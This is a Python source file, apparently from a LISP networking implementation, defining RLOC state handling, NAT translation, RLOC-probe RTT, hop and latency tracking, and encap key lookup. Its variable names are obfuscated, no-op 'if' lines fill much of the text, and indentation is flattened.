class lisp_rloc ( object ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = lisp_get_timestamp ( )
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . rloc_probe_latency = "?/?"
self . recent_rloc_probe_latencies = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
self . multicast_rloc_probe_list = { }
if 17 - 17: IiII + iII111i * OoO0O00 / iII111i
if ( recurse == False ) : return
if 67 - 67: i1IIi * IiII . OoOoOO00 % iIii1I11I1II1 - iIii1I11I1II1 * I1ii11iIi11i
if 96 - 96: iII111i / i11iIiiIii / oO0o + Oo0Ooo
if 65 - 65: OoOoOO00
if 87 - 87: I11i % i1IIi + i11iIiiIii * II111iiii
if 58 - 58: OoO0O00 * I1IiiI - II111iiii / Ii1I - I1IiiI % OoooooooOO
if 33 - 33: IiII / i1IIi + I1Ii111
Ii11i = lisp_get_default_route_next_hops ( )
if ( Ii11i == [ ] or len ( Ii11i ) == 1 ) : return
if 29 - 29: I11i + ooOoO0o % oO0o * iII111i
self . rloc_next_hop = Ii11i [ 0 ]
i11iII11I1III = self
for OoII1 in Ii11i [ 1 : : ] :
iiIIIiiii = lisp_rloc ( False )
iiIIIiiii = copy . deepcopy ( self )
iiIIIiiii . rloc_next_hop = OoII1
i11iII11I1III . next_rloc = iiIIIiiii
i11iII11I1III = iiIIIiiii
if 70 - 70: Ii1I + Oo0Ooo + Oo0Ooo / i1IIi
if 33 - 33: OoooooooOO + o0oOOo0O0Ooo . OoOoOO00 % Oo0Ooo * O0
if 49 - 49: I1ii11iIi11i * I1Ii111 - OoooooooOO . i1IIi . I1ii11iIi11i
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 37 - 37: IiII - oO0o
if 92 - 92: I1IiiI
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 51 - 51: OoO0O00 + Oo0Ooo - OOooOOo + I1ii11iIi11i
if 32 - 32: I1ii11iIi11i % OoOoOO00 + Oo0Ooo
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 92 - 92: II111iiii . O0 . iIii1I11I1II1 % IiII - i11iIiiIii
if 9 - 9: OoO0O00
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 60 - 60: O0 / OoOoOO00 % i11iIiiIii % II111iiii / OoooooooOO
if 52 - 52: ooOoO0o
if 100 - 100: Oo0Ooo - o0oOOo0O0Ooo + iIii1I11I1II1 / ooOoO0o % iIii1I11I1II1
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 4 - 4: OoOoOO00 / Oo0Ooo - OoO0O00 . OoOoOO00 / I1Ii111
if 60 - 60: OOooOOo * I1Ii111
def print_rloc ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , i1 , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 17 - 17: iII111i * I11i / iIii1I11I1II1 - II111iiii
if 97 - 97: II111iiii * o0oOOo0O0Ooo
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oOo = self . rloc_name
if ( cour ) : oOo = lisp_print_cour ( oOo )
return ( 'rloc-name: {}' . format ( blue ( oOo , cour ) ) )
if 13 - 13: o0oOOo0O0Ooo . II111iiii
if 76 - 76: II111iiii + I1Ii111 . OoooooooOO / IiII % i11iIiiIii
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
ooO0 = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 87 - 87: Ii1I / OoOoOO00 / OOooOOo
if 11 - 11: o0oOOo0O0Ooo * OoO0O00 . o0oOOo0O0Ooo - I1IiiI / IiII - OOooOOo
if 19 - 19: i1IIi + IiII . OoO0O00 / O0 - I1Ii111 - Oo0Ooo
if 24 - 24: iII111i + i1IIi
iIIiI11 = self . rloc
if ( iIIiI11 . is_null ( ) == False ) :
iII1ii1 = lisp_get_nat_info ( iIIiI11 , self . rloc_name )
if ( iII1ii1 ) :
ooO0 = iII1ii1 . port
oOoOooooO = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
O0O0 = iIIiI11 . print_address_no_iid ( )
IIIOo0O = red ( O0O0 , False )
O00ooO0Oo = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 63 - 63: I1Ii111 + iIii1I11I1II1 / Oo0Ooo
if 6 - 6: ooOoO0o + I1ii11iIi11i * I1IiiI / OoO0O00 / OoooooooOO
if 23 - 23: ooOoO0o
if 99 - 99: OOooOOo % I11i
if 56 - 56: ooOoO0o
if 5 - 5: I1Ii111 + I1Ii111 * i11iIiiIii . OoO0O00
if ( iII1ii1 . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( IIIOo0O , ooO0 , O00ooO0Oo ) )
if 50 - 50: iII111i - I1ii11iIi11i . Ii1I + i11iIiiIii + IiII * I1Ii111
if 51 - 51: iII111i * OoO0O00 * o0oOOo0O0Ooo . i1IIi
iII1ii1 = None if ( iII1ii1 == oOoOooooO ) else oOoOooooO
if ( iII1ii1 and iII1ii1 . timed_out ( ) ) :
ooO0 = iII1ii1 . port
IIIOo0O = red ( iII1ii1 . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( IIIOo0O , ooO0 ,
# OoOoOO00 - oO0o % iII111i . II111iiii
O00ooO0Oo ) )
iII1ii1 = None
if 36 - 36: II111iiii - ooOoO0o
if 52 - 52: i1IIi + i1IIi * i1IIi / OoOoOO00
if 98 - 98: iII111i . i1IIi + o0oOOo0O0Ooo * OoooooooOO - i11iIiiIii
if 21 - 21: i11iIiiIii . oO0o * o0oOOo0O0Ooo + Oo0Ooo * OoOoOO00 * o0oOOo0O0Ooo
if 33 - 33: I1IiiI + O0 - I11i
if 90 - 90: I1Ii111 * OoooooooOO . iIii1I11I1II1 % OoO0O00 / I11i + iII111i
if 63 - 63: o0oOOo0O0Ooo . IiII . Oo0Ooo - iIii1I11I1II1 / I1Ii111
if ( iII1ii1 ) :
if ( iII1ii1 . address != O0O0 ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( IIIOo0O , red ( iII1ii1 . address , False ) ) )
if 66 - 66: ooOoO0o * I1Ii111 - II111iiii
self . rloc . store_address ( iII1ii1 . address )
if 38 - 38: O0 % I1ii11iIi11i + O0
IIIOo0O = red ( iII1ii1 . address , False )
ooO0 = iII1ii1 . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( IIIOo0O , ooO0 , O00ooO0Oo ) )
if 37 - 37: Oo0Ooo / I1IiiI
self . store_translated_rloc ( iIIiI11 , ooO0 )
if 23 - 23: II111iiii / iII111i
if 55 - 55: i11iIiiIii - Ii1I % OoooooooOO * OoooooooOO
if 92 - 92: iIii1I11I1II1
if 47 - 47: Oo0Ooo + Oo0Ooo * ooOoO0o - OoOoOO00 + II111iiii
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 10 - 10: II111iiii / ooOoO0o . Ii1I / I1Ii111 / oO0o
if 8 - 8: OOooOOo / ooOoO0o * I11i + OOooOOo * i1IIi
if 48 - 48: o0oOOo0O0Ooo - I1ii11iIi11i / iII111i
if 63 - 63: O0 - IiII . OOooOOo % IiII . I1IiiI / oO0o
self . rle = rloc_record . rle
if ( self . rle ) :
for iIIi in self . rle . rle_nodes :
oOo = iIIi . rloc_name
iII1ii1 = lisp_get_nat_info ( iIIi . address , oOo )
if ( iII1ii1 == None ) : continue
if 79 - 79: OoOoOO00
ooO0 = iII1ii1 . port
OOO00O = oOo
if ( OOO00O ) : OOO00O = blue ( oOo , False )
if 88 - 88: oO0o * o0oOOo0O0Ooo
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( ooO0 ,
# IiII
iIIi . address . print_address_no_iid ( ) , OOO00O ) )
iIIi . translated_port = ooO0
if 52 - 52: I1Ii111 * I11i - II111iiii + OOooOOo + II111iiii
if 91 - 91: i1IIi + Oo0Ooo - I1ii11iIi11i + I1ii11iIi11i * O0 / O0
if 78 - 78: OoooooooOO
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 8 - 8: Oo0Ooo - Oo0Ooo % O0 - Ii1I / o0oOOo0O0Ooo % Oo0Ooo
if 51 - 51: iIii1I11I1II1 / iIii1I11I1II1 * I1ii11iIi11i / I11i
if 18 - 18: Ii1I - i11iIiiIii + OoO0O00 . O0 - iII111i
if 9 - 9: OoooooooOO / iII111i + o0oOOo0O0Ooo / II111iiii / I1Ii111
iIi1I = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 66 - 66: I1Ii111 + OoooooooOO % I1IiiI . iII111i * Oo0Ooo + o0oOOo0O0Ooo
if ( rloc_record . keys != None and iIi1I ) :
III = rloc_record . keys [ 1 ]
if ( III != None ) :
O0O0 = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( ooO0 )
if 96 - 96: OoO0O00 - ooOoO0o * Ii1I
III . add_key_by_rloc ( O0O0 , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( O0O0 , False ) ) )
if 34 - 34: OoO0O00 . Oo0Ooo % Ii1I . IiII + OoOoOO00
if 10 - 10: OoooooooOO * iII111i * ooOoO0o . Ii1I % I1Ii111 / I1ii11iIi11i
if 71 - 71: Ii1I + IiII
return ( ooO0 )
if 10 - 10: II111iiii % o0oOOo0O0Ooo . o0oOOo0O0Ooo % iII111i
if 2 - 2: OoooooooOO / IiII % Oo0Ooo % iIii1I11I1II1
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 62 - 62: oO0o
if 47 - 47: I1IiiI - O0 - I1ii11iIi11i . OoOoOO00
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 98 - 98: o0oOOo0O0Ooo - OoO0O00 . I1ii11iIi11i / OOooOOo
if 43 - 43: I1IiiI + OOooOOo + o0oOOo0O0Ooo
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 44 - 44: o0oOOo0O0Ooo % OoO0O00 . OoooooooOO
return ( True )
if 21 - 21: Oo0Ooo * Oo0Ooo - iII111i - O0
if 87 - 87: OOooOOo / I1Ii111 - Ii1I + O0 - oO0o - O0
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
if 68 - 68: iII111i + II111iiii + I1ii11iIi11i * OOooOOo / oO0o
if 41 - 41: OOooOOo + Oo0Ooo % I1IiiI
if 3 - 3: ooOoO0o * Ii1I
def print_state_change ( self , new_state ) :
iiI1II = self . print_state ( )
i1i111III1 = "{} -> {}" . format ( iiI1II , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
i1i111III1 = bold ( i1i111III1 , False )
if 10 - 10: oO0o * iII111i
return ( i1i111III1 )
if 47 - 47: OoO0O00
if 98 - 98: OoooooooOO - oO0o / O0
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
if 23 - 23: o0oOOo0O0Ooo % OoooooooOO % iIii1I11I1II1 / OoOoOO00 / I1Ii111
if 6 - 6: Oo0Ooo
def print_recent_rloc_probe_rtts ( self ) :
ooOoO000oOoo = str ( self . recent_rloc_probe_rtts )
ooOoO000oOoo = ooOoO000oOoo . replace ( "-1" , "?" )
return ( ooOoO000oOoo )
if 57 - 57: I11i / iII111i . i11iIiiIii % Oo0Ooo + I1ii11iIi11i / i11iIiiIii
if 94 - 94: i1IIi * i1IIi / Ii1I
def compute_rloc_probe_rtt ( self ) :
i11iII11I1III = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
IiI1i1Iiii = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ i11iII11I1III ] + IiI1i1Iiii [ 0 : - 1 ]
if 45 - 45: I1ii11iIi11i / iIii1I11I1II1 + OoO0O00 / O0 - O0 - I1Ii111
if 88 - 88: o0oOOo0O0Ooo % I1Ii111
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
if 4 - 4: i11iIiiIii + o0oOOo0O0Ooo % I11i - I1ii11iIi11i * I1ii11iIi11i
if 87 - 87: I1Ii111 % i11iIiiIii + O0
def print_recent_rloc_probe_hops ( self ) :
Ooooo = str ( self . recent_rloc_probe_hops )
return ( Ooooo )
if 96 - 96: iIii1I11I1II1 / i1IIi . OOooOOo + II111iiii
if 4 - 4: I1IiiI * I11i % i11iIiiIii . I1ii11iIi11i
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < old_div ( LISP_RLOC_PROBE_TTL , 2 ) ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if 22 - 22: iIii1I11I1II1 - i1IIi - i11iIiiIii / I1IiiI + o0oOOo0O0Ooo
if ( from_ttl < old_div ( LISP_RLOC_PROBE_TTL , 2 ) ) :
ooo0oOO0O0O0o = "!"
else :
ooo0oOO0O0O0o = str ( LISP_RLOC_PROBE_TTL - from_ttl )
if 96 - 96: I11i - II111iiii
if 66 - 66: OoooooooOO * OoooooooOO
i11iII11I1III = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + ooo0oOO0O0O0o
IiI1i1Iiii = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ i11iII11I1III ] + IiI1i1Iiii [ 0 : - 1 ]
if 54 - 54: iII111i / OoO0O00 . O0 * iII111i % OoOoOO00 % iIii1I11I1II1
if 37 - 37: iII111i - ooOoO0o * Ii1I + II111iiii * i11iIiiIii
def store_rloc_probe_latencies ( self , json_telemetry ) :
IiI111i1iI1 = lisp_decode_telemetry ( json_telemetry )
if 3 - 3: oO0o + OoO0O00 % Oo0Ooo / OoooooooOO / i11iIiiIii . OoooooooOO
oOi11iIIIIi = round ( float ( IiI111i1iI1 [ "etr-in" ] ) - float ( IiI111i1iI1 [ "itr-out" ] ) , 3 )
o0o = round ( float ( IiI111i1iI1 [ "itr-in" ] ) - float ( IiI111i1iI1 [ "etr-out" ] ) , 3 )
if 28 - 28: Ii1I + OOooOOo % IiII . i11iIiiIii - I1IiiI * Oo0Ooo
i11iII11I1III = self . rloc_probe_latency
self . rloc_probe_latency = str ( oOi11iIIIIi ) + "/" + str ( o0o )
IiI1i1Iiii = self . recent_rloc_probe_latencies
self . recent_rloc_probe_latencies = [ i11iII11I1III ] + IiI1i1Iiii [ 0 : - 1 ]
if 2 - 2: I11i * I1ii11iIi11i + O0
if 44 - 44: iIii1I11I1II1 / II111iiii - ooOoO0o
def print_rloc_probe_latency ( self ) :
return ( self . rloc_probe_latency )
if 10 - 10: OOooOOo
if 78 - 78: OOooOOo * I1ii11iIi11i % i11iIiiIii % o0oOOo0O0Ooo . I1ii11iIi11i / OoooooooOO
def print_recent_rloc_probe_latencies ( self ) :
IiII1IIii1 = str ( self . recent_rloc_probe_latencies )
return ( IiII1IIii1 )
if 80 - 80: IiII + i11iIiiIii . I1Ii111 * Oo0Ooo % OoooooooOO
if 12 - 12: iII111i / I11i
def process_rloc_probe_reply ( self , ts , nonce , eid , group , hc , ttl , jt ) :
iIIiI11 = self
while ( True ) :
if ( iIIiI11 . last_rloc_probe_nonce == nonce ) : break
iIIiI11 = iIIiI11 . next_rloc
if ( iIIiI11 == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
if 70 - 70: Oo0Ooo + O0 - o0oOOo0O0Ooo
return
if 85 - 85: I1Ii111
if 39 - 39: OoOoOO00 * oO0o
if 62 - 62: OoOoOO00 / OoOoOO00 * OoO0O00
if 38 - 38: I1Ii111 + ooOoO0o % I11i
if 22 - 22: I1Ii111 . Ii1I % I1Ii111 * I1IiiI / iIii1I11I1II1
if 12 - 12: Oo0Ooo / IiII % ooOoO0o / iIii1I11I1II1 % O0 / i11iIiiIii
iIIiI11 . last_rloc_probe_reply = ts
iIIiI11 . compute_rloc_probe_rtt ( )
ooo0oOOOooOoO = iIIiI11 . print_state_change ( "up" )
if ( iIIiI11 . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( iIIiI11 . rloc , True )
iIIiI11 . state = LISP_RLOC_UP_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
I11iiI1III = lisp_map_cache . lookup_cache ( eid , True )
if ( I11iiI1III ) : lisp_write_ipc_map_cache ( True , I11iiI1III )
if 54 - 54: i1IIi + OoOoOO00
if 76 - 76: OoOoOO00
if 54 - 54: o0oOOo0O0Ooo . i11iIiiIii + I1IiiI * ooOoO0o - ooOoO0o
if 28 - 28: I1Ii111 . i11iIiiIii * oO0o % ooOoO0o / iII111i . OOooOOo
if 57 - 57: OoooooooOO . iIii1I11I1II1 % iII111i % Oo0Ooo
iIIiI11 . store_rloc_probe_hops ( hc , ttl )
if 92 - 92: I1Ii111 - Ii1I + I1Ii111
if 8 - 8: Oo0Ooo . iII111i / i11iIiiIii + iIii1I11I1II1 - OoOoOO00
if 1 - 1: i11iIiiIii
if 25 - 25: OoooooooOO / II111iiii . OOooOOo * OoOoOO00 - OoooooooOO
if ( jt ) : iIIiI11 . store_rloc_probe_latencies ( jt )
if 8 - 8: iII111i . iIii1I11I1II1 * O0
Oooooo0OOO = bold ( "RLOC-probe reply" , False )
O0O0 = iIIiI11 . rloc . print_address_no_iid ( )
OOOooOOoOO0o = bold ( str ( iIIiI11 . print_rloc_probe_rtt ( ) ) , False )
iIIiiIi = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
if 5 - 5: I1ii11iIi11i / Oo0Ooo
OoII1 = ""
if ( iIIiI11 . rloc_next_hop != None ) :
IiI11I111 , iii1111ii = iIIiI11 . rloc_next_hop
OoII1 = ", nh {}({})" . format ( iii1111ii , IiI11I111 )
if 71 - 71: iIii1I11I1II1 % ooOoO0o - I1Ii111
if 81 - 81: i1IIi . IiII / Oo0Ooo . I1Ii111 . iIii1I11I1II1 + iIii1I11I1II1
ooOO0OOo0oo0 = bold ( iIIiI11 . print_rloc_probe_latency ( ) , False )
ooOO0OOo0oo0 = ", latency {}" . format ( ooOO0OOo0oo0 ) if jt else ""
if 35 - 35: I1ii11iIi11i / OoOoOO00 / i1IIi / i11iIiiIii * iIii1I11I1II1 / i1IIi
oO0ooOOO = green ( lisp_print_eid_tuple ( eid , group ) , False )
if 69 - 69: OOooOOo / I1Ii111 * II111iiii
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}{}" ) . format ( Oooooo0OOO , red ( O0O0 , False ) , iIIiiIi , oO0ooOOO ,
# o0oOOo0O0Ooo + OoO0O00 % Oo0Ooo + ooOoO0o . I11i / o0oOOo0O0Ooo
ooo0oOOOooOoO , OOOooOOoOO0o , OoII1 , str ( hc ) + "/" + str ( ttl ) , ooOO0OOo0oo0 ) )
if 56 - 56: iII111i * OoooooooOO . I1IiiI * oO0o - i11iIiiIii * iII111i
if ( iIIiI11 . rloc_next_hop == None ) : return
if 5 - 5: IiII . ooOoO0o - I1IiiI % i1IIi * OoO0O00
if 45 - 45: I1Ii111
if 76 - 76: OOooOOo % i1IIi + I1IiiI - iIii1I11I1II1 + O0
if 9 - 9: oO0o % Ii1I
iIIiI11 = None
IiIi111I = None
while ( True ) :
iIIiI11 = self if iIIiI11 == None else iIIiI11 . next_rloc
if ( iIIiI11 == None ) : break
if ( iIIiI11 . up_state ( ) == False ) : continue
if ( iIIiI11 . rloc_probe_rtt == - 1 ) : continue
if 52 - 52: Oo0Ooo * iII111i - O0 . OoOoOO00 - I1IiiI
if ( IiIi111I == None ) : IiIi111I = iIIiI11
if ( iIIiI11 . rloc_probe_rtt < IiIi111I . rloc_probe_rtt ) : IiIi111I = iIIiI11
if 47 - 47: II111iiii
if 8 - 8: ooOoO0o + OoooooooOO
if ( IiIi111I != None ) :
IiI11I111 , iii1111ii = IiIi111I . rloc_next_hop
OoII1 = bold ( "nh {}({})" . format ( iii1111ii , IiI11I111 ) , False )
lprint ( " Install host-route via best {}" . format ( OoII1 ) )
lisp_install_host_route ( O0O0 , None , False )
lisp_install_host_route ( O0O0 , iii1111ii , True )
if 85 - 85: I11i / i1IIi * i11iIiiIii / I1IiiI - Ii1I
if 25 - 25: iII111i - Oo0Ooo % iIii1I11I1II1 + o0oOOo0O0Ooo + iIii1I11I1II1
if 63 - 63: OoOoOO00 - o0oOOo0O0Ooo % II111iiii - Ii1I
def add_to_rloc_probe_list ( self , eid , group ) :
O0O0 = self . rloc . print_address_no_iid ( )
ooO0 = self . translated_port
if ( ooO0 != 0 ) : O0O0 += ":" + str ( ooO0 )
if 81 - 81: iII111i % OOooOOo * oO0o
if ( O0O0 not in lisp_rloc_probe_list ) :
lisp_rloc_probe_list [ O0O0 ] = [ ]
if 84 - 84: iII111i - OoooooooOO + I1ii11iIi11i - I1IiiI
if 52 - 52: oO0o / ooOoO0o / iII111i / OoOoOO00 * iIii1I11I1II1
if ( group . is_null ( ) ) : group . instance_id = 0
for iiiI1I , oO0ooOOO , Oo in lisp_rloc_probe_list [ O0O0 ] :
if ( oO0ooOOO . is_exact_match ( eid ) and Oo . is_exact_match ( group ) ) :
if ( iiiI1I == self ) :
if ( lisp_rloc_probe_list [ O0O0 ] == [ ] ) :
lisp_rloc_probe_list . pop ( O0O0 )
if 74 - 74: oO0o . I1ii11iIi11i - iIii1I11I1II1
return
if 73 - 73: OoO0O00 / O0 . o0oOOo0O0Ooo
lisp_rloc_probe_list [ O0O0 ] . remove ( [ iiiI1I , oO0ooOOO , Oo ] )
break
if 100 - 100: Ii1I . OoO0O00 % I1ii11iIi11i % O0 * Oo0Ooo - OoOoOO00
if 15 - 15: OOooOOo - OOooOOo - OoooooooOO * OoO0O00
lisp_rloc_probe_list [ O0O0 ] . append ( [ self , eid , group ] )
if 12 - 12: II111iiii * I1Ii111 / I1Ii111 * oO0o * Oo0Ooo
if 17 - 17: OoOoOO00 % I1Ii111 / iII111i * I1Ii111
if 96 - 96: Oo0Ooo % o0oOOo0O0Ooo . OoOoOO00 % i11iIiiIii / OoooooooOO
if 87 - 87: OoooooooOO - Ii1I . I11i / I1Ii111 . i1IIi
if 86 - 86: i1IIi . oO0o % OOooOOo
iIIiI11 = lisp_rloc_probe_list [ O0O0 ] [ 0 ] [ 0 ]
if ( iIIiI11 . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
if 99 - 99: oO0o / I1Ii111 * oO0o * I11i
if 38 - 38: o0oOOo0O0Ooo + OoOoOO00
if 24 - 24: Ii1I - OOooOOo - o0oOOo0O0Ooo - I1Ii111 / OoooooooOO
def delete_from_rloc_probe_list ( self , eid , group ) :
O0O0 = self . rloc . print_address_no_iid ( )
ooO0 = self . translated_port
if ( ooO0 != 0 ) : O0O0 += ":" + str ( ooO0 )
if ( O0O0 not in lisp_rloc_probe_list ) : return
if 17 - 17: OoO0O00
o0oOooooo = [ ]
for oo0O00OOOOO in lisp_rloc_probe_list [ O0O0 ] :
if ( oo0O00OOOOO [ 0 ] != self ) : continue
if ( oo0O00OOOOO [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( oo0O00OOOOO [ 2 ] . is_exact_match ( group ) == False ) : continue
o0oOooooo = oo0O00OOOOO
break
if 30 - 30: OoOoOO00 % Ii1I / iIii1I11I1II1 % OOooOOo - I1ii11iIi11i * OoO0O00
if ( o0oOooooo == [ ] ) : return
if 25 - 25: i1IIi * oO0o . I11i
try :
lisp_rloc_probe_list [ O0O0 ] . remove ( o0oOooooo )
if ( lisp_rloc_probe_list [ O0O0 ] == [ ] ) :
lisp_rloc_probe_list . pop ( O0O0 )
if 15 - 15: oO0o
except :
return
if 45 - 45: Oo0Ooo * IiII * OoO0O00 + iIii1I11I1II1
if 89 - 89: IiII . IiII . oO0o % iII111i
if 27 - 27: OoOoOO00 + O0 % i1IIi - Oo0Ooo
def print_rloc_probe_state ( self , trailing_linefeed ) :
oOo0OOoooO = ""
iIIiI11 = self
while ( True ) :
OoOO00OO0o = iIIiI11 . last_rloc_probe
if ( OoOO00OO0o == None ) : OoOO00OO0o = 0
IIiiiII1 = iIIiI11 . last_rloc_probe_reply
if ( IIiiiII1 == None ) : IIiiiII1 = 0
OOOooOOoOO0o = iIIiI11 . print_rloc_probe_rtt ( )
I111 = space ( 4 )
if 45 - 45: O0 * II111iiii / i11iIiiIii
if ( iIIiI11 . rloc_next_hop == None ) :
oOo0OOoooO += "RLOC-Probing:\n"
else :
IiI11I111 , iii1111ii = iIIiI11 . rloc_next_hop
oOo0OOoooO += "RLOC-Probing for nh {}({}):\n" . format ( iii1111ii , IiI11I111 )
if 38 - 38: OoooooooOO % i11iIiiIii - O0 / O0
if 59 - 59: OoO0O00 % iII111i + oO0o * II111iiii . OOooOOo
oOo0OOoooO += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( I111 , lisp_print_elapsed ( OoOO00OO0o ) ,
# OOooOOo % OOooOOo
I111 , lisp_print_elapsed ( IIiiiII1 ) , OOOooOOoOO0o )
if 8 - 8: Ii1I / ooOoO0o
if ( trailing_linefeed ) : oOo0OOoooO += "\n"
if 11 - 11: oO0o * OoooooooOO
iIIiI11 = iIIiI11 . next_rloc
if ( iIIiI11 == None ) : break
oOo0OOoooO += "\n"
if 88 - 88: I1Ii111 % OOooOOo - iIii1I11I1II1 / I1ii11iIi11i
return ( oOo0OOoooO )
if 12 - 12: ooOoO0o * I1ii11iIi11i * O0 / oO0o + iII111i - iIii1I11I1II1
if 81 - 81: Ii1I
def get_encap_keys ( self ) :
ooO0 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 87 - 87: O0 % iII111i
O0O0 = self . rloc . print_address_no_iid ( ) + ":" + ooO0
if 57 - 57: Ii1I
try :
iI1iiiiiii = lisp_crypto_keys_by_rloc_encap [ O0O0 ]
if ( iI1iiiiiii [ 1 ] ) : return ( iI1iiiiiii [ 1 ] . encrypt_key , iI1iiiiiii [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 49 - 49: I11i
if 22 - 22: Oo0Ooo % OOooOOo + O0 - OoO0O00 % I11i * O0
if 42 - 42: O0
def rloc_recent_rekey ( self ) :
ooO0 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 55 - 55: i11iIiiIii % OOooOOo
O0O0 = self . rloc . print_address_no_iid ( ) + ":" + ooO0
if 10 - 10: OoOoOO00 / i11iIiiIii
try :
III = lisp_crypto_keys_by_rloc_encap [ O0O0 ] [ 1 ]
if ( III == None ) : return ( False )
if ( III . last_rekey == None ) : return ( True )
return ( time . time ( ) - III . last_rekey < 1 )
except :
return ( False )
if 21 - 21: Ii1I - i1IIi / I11i + IiII
if 44 - 44: OoooooooOO % I11i / O0
if 94 - 94: IiII
if 83 - 83: OoO0O00
class lisp_mapping ( object ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . register_ttl = LISP_REGISTER_TTL
self . last_refresh_time = self . uptime
self . source_cache = None
